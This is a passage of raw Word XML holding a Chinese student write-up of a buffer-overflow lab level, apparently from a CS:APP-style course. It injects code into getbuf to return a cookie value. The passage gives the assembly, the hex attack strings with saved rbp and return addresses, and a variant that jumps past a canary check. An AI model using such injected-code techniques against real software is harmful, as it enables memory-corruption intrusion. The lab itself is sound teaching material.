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7217" w14:textId="175C6463" w:rsidR="00BE4F1B" w:rsidRDefault="00B55309">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本关要求进行“无感攻击”，即调用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后继续执行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函数，但要以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作为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的返回值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E83DAD1" w14:textId="0FA67E78" w:rsidR="00B55309" w:rsidRDefault="00B55309">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30694994" wp14:editId="1955E7B3">
            <wp:extent cx="5274310" cy="1323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7D2A" w14:textId="29C55E91" w:rsidR="00B55309" w:rsidRDefault="00B55309">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从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函数的源码来看，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正常的返回值是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，而返回值是通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>ax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>寄存器代回的，因此只需要修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>ax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>寄存器的值为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即可。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C9B01A" w14:textId="3D918B0D" w:rsidR="00B55309" w:rsidRDefault="00B55309" w:rsidP="00B55309">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47EAC320" wp14:editId="135EF960">
            <wp:extent cx="5274310" cy="313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5621" w14:textId="22989782" w:rsidR="00757E69" w:rsidRDefault="00B55309" w:rsidP="00B55309">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在炸弹程序的反汇编代码中注意到，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数调用了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函数。</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:t>est</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:t>函数中调用</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:t>etbuf</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记下</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:t>est</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过程“</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:t>all getbuf</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”指令的下一条指令的地址，也就是</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:t>x4011ae</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:t>，这个地址要作为</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:t>etbuf</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:t>完成攻击后的返回地址。</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了修改</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:t>etbuf</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:t>的返回值，不能让</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:t>etbuf</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:t>正常返回，必须让</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:t>etbuf</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:t>执行恶意代码，修改</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:t>ax</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:t>寄存器的值</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:t>，然后直接跳转到</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:t>x4011ae</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:t>继续执行</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:t>est</w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:t>函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC28162" w14:textId="1B841C68" w:rsidR="00757E69" w:rsidRDefault="00757E69" w:rsidP="00B55309">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在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函数中注入如下恶意代码完成返回值的修改和函数的跳转：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F94EC99" w14:textId="77777777" w:rsidR="00757E69" w:rsidRPr="00757E69" w:rsidRDefault="00757E69" w:rsidP="00757E69">
      <w:r w:rsidRPr="00757E69">
        <w:t>movl $0x2e561bea, %eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F457508" w14:textId="77777777" w:rsidR="00757E69" w:rsidRPr="00757E69" w:rsidRDefault="00757E69" w:rsidP="00757E69">
      <w:r w:rsidRPr="00757E69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>j</w:t>
      </w:r>
      <w:r w:rsidRPr="00757E69">
        <w:t xml:space="preserve">mp </w:t>
      </w:r>
      <w:r w:rsidRPr="00757E69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00757E69">
        <w:t>x4011ae</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBA3D20" w14:textId="77777777" w:rsidR="00757E69" w:rsidRDefault="00757E69" w:rsidP="00B55309"/>
    <w:p w14:paraId="793D4D8D" w14:textId="3F5BEB10" w:rsidR="00212432" w:rsidRDefault="00212432" w:rsidP="00B55309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软件完成上述代码到机器语言的编译：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C1E523" w14:textId="66A1ADFA" w:rsidR="00AB14C4" w:rsidRDefault="00BF036C" w:rsidP="00B5530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39C30DA" wp14:editId="2588F3F7">
            <wp:extent cx="5274310" cy="86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E5C" w14:textId="24C0FD45" w:rsidR="00AB14C4" w:rsidRDefault="00AB14C4" w:rsidP="00B55309">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AC0FE7C" w14:textId="78EF9A49" w:rsidR="00AB14C4" w:rsidRDefault="00AB14C4" w:rsidP="00B55309">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AFEC80D" w14:textId="77777777" w:rsidR="00AB14C4" w:rsidRDefault="00AB14C4" w:rsidP="00B55309">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12BA5FC4" w14:textId="77777210" w:rsidR="00C571B2" w:rsidRDefault="00C571B2" w:rsidP="00B55309">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面构造攻击字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6618B0" w14:textId="77777777" w:rsidR="00F32CB3" w:rsidRDefault="00F32CB3" w:rsidP="00F32CB3">
      <w:r>
        <w:t>/* bad code of asm */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACE12F8" w14:textId="0D723E12" w:rsidR="00F32CB3" w:rsidRDefault="00F32CB3" w:rsidP="00F32CB3">
      <w:r>
        <w:t xml:space="preserve">/* </w:t>
      </w:r>
      <w:r w:rsidR="00757E69" w:rsidRPr="00757E69">
        <w:t>movl $0x2e561bea, %eax</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBA97D4" w14:textId="77777777" w:rsidR="00F32CB3" w:rsidRDefault="00F32CB3" w:rsidP="00F32CB3">
      <w:r>
        <w:t>/* jmp 0x4011ae */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275F4A6D" w14:textId="219F71FE" w:rsidR="00F32CB3" w:rsidRDefault="00F32CB3" w:rsidP="00F32CB3">
      <w:r>
        <w:t xml:space="preserve">b8 ea 1b 56 2e e9 </w:t>
      </w:r>
      <w:r w:rsidR="00BF036C">
        <w:t>f4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> d</w:t>
      </w:r>
      <w:r w:rsidR="00BF036C">
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> d7 aa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB70A19" w14:textId="77777777" w:rsidR="00F32CB3" w:rsidRDefault="00F32CB3" w:rsidP="00F32CB3">
      <w:r>
        <w:t>/* complete the string */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420B1409" w14:textId="77777777" w:rsidR="00F32CB3" w:rsidRDefault="00F32CB3" w:rsidP="00F32CB3">
      <w:r>
        <w:t>00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0C6487" w14:textId="77777777" w:rsidR="00F32CB3" w:rsidRDefault="00F32CB3" w:rsidP="00F32CB3">
      <w:r>
        <w:t>/* rbp */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C795EEA" w14:textId="0CA79826" w:rsidR="00F32CB3" w:rsidRDefault="00757E69" w:rsidP="00F32CB3">
      <w:r>
        <w:t>d0</w:t>
      </w:r>
      <w:r w:rsidR="00F32CB3">
        <w:t xml:space="preserve"> 39 68 55 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573B28F9" w14:textId="77777777" w:rsidR="00F32CB3" w:rsidRDefault="00F32CB3" w:rsidP="00F32CB3">
      <w:r>
        <w:t>/* ret add */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D443C05" w14:textId="2570C26A" w:rsidR="00212432" w:rsidRDefault="00757E69" w:rsidP="00F32CB3">
      <w:r>
        <w:t>b0</w:t>
      </w:r>
      <w:r w:rsidR="00F32CB3">
        <w:t xml:space="preserve"> 39 68 55 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529C6305" w14:textId="548F93F4" w:rsidR="00F32CB3" w:rsidRDefault="00F32CB3" w:rsidP="00F32CB3"/>
    <w:p w14:paraId="09D90605" w14:textId="6E3F3DFE" w:rsidR="00F32CB3" w:rsidRDefault="00952077" w:rsidP="00F32CB3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是发现这样的字符串输入后会得到如下输出：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B1B7FD" w14:textId="0FAA00DE" w:rsidR="00952077" w:rsidRDefault="007366F5" w:rsidP="00F32CB3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3343A5A5" wp14:editId="3B38DE04">
            <wp:extent cx="5274310" cy="869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D3CB" w14:textId="27F316E7" w:rsidR="00952077" w:rsidRDefault="00952077" w:rsidP="00F32CB3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在代码中发现了这样一段，类似于金丝雀</w:t>
      </w:r>
      <w:r w:rsidR="007366F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，在调用</w:t>
      </w:r>
      <w:r w:rsidR="007366F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="007366F5">
        <w:t>etbuf</w:t>
      </w:r>
      <w:r w:rsidR="007366F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前后分别调用了一次</w:t>
      </w:r>
      <w:r w:rsidR="007366F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="007366F5">
        <w:t>niqueval</w:t>
      </w:r>
      <w:r w:rsidR="007366F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
      <w:r w:rsidR="00DD10A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，会生成随机数并放到</w:t>
      </w:r>
      <w:r w:rsidR="00DD10A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00DD10A4">
        <w:t>bp-8</w:t>
      </w:r>
      <w:r w:rsidR="00DD10A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的位置，在调用</w:t>
      </w:r>
      <w:r w:rsidR="00DD10A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="00DD10A4">
        <w:t>etbuf</w:t>
      </w:r>
      <w:r w:rsidR="00DD10A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后再检测一次这个位置的值，看两次的数是否一样。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5E1C5C" w14:textId="03D5BE45" w:rsidR="007366F5" w:rsidRDefault="007366F5" w:rsidP="00F32CB3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F658011" wp14:editId="5DB6EC50">
            <wp:extent cx="5274310" cy="2144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925" w14:textId="37DF2804" w:rsidR="00952077" w:rsidRDefault="00DD10A4" w:rsidP="00F32CB3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了</w:t>
      </w:r>
      <w:r w:rsidR="007366F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个金丝雀，我们可以在恶意代码中直接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>j</w:t>
      </w:r>
      <w:r>
        <w:t>mp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到金丝雀的验证之后</w:t>
      </w:r>
      <w:r w:rsidR="00BF1D3F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，也就是地址为</w:t>
      </w:r>
      <w:r w:rsidR="00BF1D3F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00BF1D3F">
        <w:t>x4011d0</w:t>
      </w:r>
      <w:r w:rsidR="00BF1D3F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的位置</w:t>
      </w:r>
      <w:r w:rsidR="007366F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是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过程在调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>etbuf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后将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寄存器的值放到了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>bp-4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的位置，</w:t>
      </w:r>
      <w:r w:rsidR="0085141D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因此在恶意代码中同样需要完成这个操作。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr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动态调试可以知道在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过程中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>的值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD10A4">
        <w:t>556839d0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bp-4=0x</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD10A4">
        <w:t>556839CC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，而在执行恶意代码时的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>bp</w:t>
      </w:r>
      <w:r w:rsidR="0085141D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD10A4">
        <w:t>556839d0</w:t>
      </w:r>
      <w:r w:rsidR="0085141D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，因此恶意代码中同样要将</w:t>
      </w:r>
      <w:r w:rsidR="0085141D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="0085141D">
        <w:t>ax</w:t>
      </w:r>
      <w:r w:rsidR="0085141D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>移动到</w:t>
      </w:r>
      <w:r w:rsidR="0085141D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="0085141D">
        <w:t>bp-4</w:t>
      </w:r>
      <w:r w:rsidR="0085141D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的位置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2C502D" w14:textId="13E23609" w:rsidR="0085141D" w:rsidRDefault="00BF1D3F" w:rsidP="00F32CB3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="683FC531" wp14:editId="1D3046A1">
            <wp:extent cx="5274310" cy="4133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D6C" w14:textId="73FF8F8C" w:rsidR="00395C71" w:rsidRDefault="0085141D" w:rsidP="00F32CB3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造的新代码如上图。</w:t>
      </w:r>
      <w:r w:rsidR="00395C71">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样之后，构造的攻击字符串如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2457B47F" w14:textId="77777777" w:rsidR="00395C71" w:rsidRPr="00395C71" w:rsidRDefault="00395C71" w:rsidP="00395C71">
      <w:r w:rsidRPr="00395C71">
        <w:t>/* bad code of asm */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B420F6" w14:textId="2809E565" w:rsidR="00395C71" w:rsidRDefault="00395C71" w:rsidP="00395C71">
      <w:r w:rsidRPr="00395C71">
        <w:lastRenderedPageBreak/>
        <w:t>/* movl $0x2e561bea, %eax */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB211BC" w14:textId="22FA86F7" w:rsidR="00395C71" w:rsidRPr="00395C71" w:rsidRDefault="00395C71" w:rsidP="00395C71">
      <w:r>
        <w:t>b8 ea 1b 56 2e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40615961" w14:textId="0F77DFE1" w:rsidR="00395C71" w:rsidRDefault="00395C71" w:rsidP="00395C71">
      <w:r w:rsidRPr="00395C71">
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mov %eax, -4(%rbp) </w:t>
      </w:r>
      <w:r w:rsidRPr="00395C71">
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D4775C" w14:textId="054C2A73" w:rsidR="00395C71" w:rsidRDefault="00203D20" w:rsidP="00395C71">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>9 45 fc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560534C6" w14:textId="37B358BE" w:rsidR="00203D20" w:rsidRPr="00395C71" w:rsidRDefault="00203D20" w:rsidP="00395C71">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>* jmp 0x4011d0 */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AEBA2C" w14:textId="6DE373CA" w:rsidR="00395C71" w:rsidRPr="00395C71" w:rsidRDefault="00203D20" w:rsidP="00395C71">
      <w:r>
        <w:t>e9 13 d8 d7 aa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57292551" w14:textId="77777777" w:rsidR="00395C71" w:rsidRPr="00395C71" w:rsidRDefault="00395C71" w:rsidP="00395C71">
      <w:r w:rsidRPr="00395C71">
        <w:t>/* complete the string */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60896DAA" w14:textId="770B979E" w:rsidR="00395C71" w:rsidRPr="00395C71" w:rsidRDefault="00395C71" w:rsidP="00395C71">
      <w:r w:rsidRPr="00395C71">
        <w:t>00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1340F96A" w14:textId="77777777" w:rsidR="00395C71" w:rsidRPr="00395C71" w:rsidRDefault="00395C71" w:rsidP="00395C71">
      <w:r w:rsidRPr="00395C71">
        <w:t>/* rbp */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAD0524" w14:textId="77777777" w:rsidR="00395C71" w:rsidRPr="00395C71" w:rsidRDefault="00395C71" w:rsidP="00395C71">
      <w:r w:rsidRPr="00395C71">
        <w:t>d0 39 68 55 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAB014F" w14:textId="77777777" w:rsidR="00395C71" w:rsidRPr="00395C71" w:rsidRDefault="00395C71" w:rsidP="00395C71">
      <w:r w:rsidRPr="00395C71">
        <w:t>/* ret add */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515DF543" w14:textId="77777777" w:rsidR="00395C71" w:rsidRPr="00395C71" w:rsidRDefault="00395C71" w:rsidP="00395C71">
      <w:r w:rsidRPr="00395C71">
        <w:t>b0 39 68 55 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E32DABB" w14:textId="7F527119" w:rsidR="00395C71" w:rsidRDefault="00395C71" w:rsidP="00F32CB3"/>
    <w:p w14:paraId="18C9BD9A" w14:textId="6671C708" w:rsidR="00203D20" w:rsidRDefault="00203D20" w:rsidP="00F32CB3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
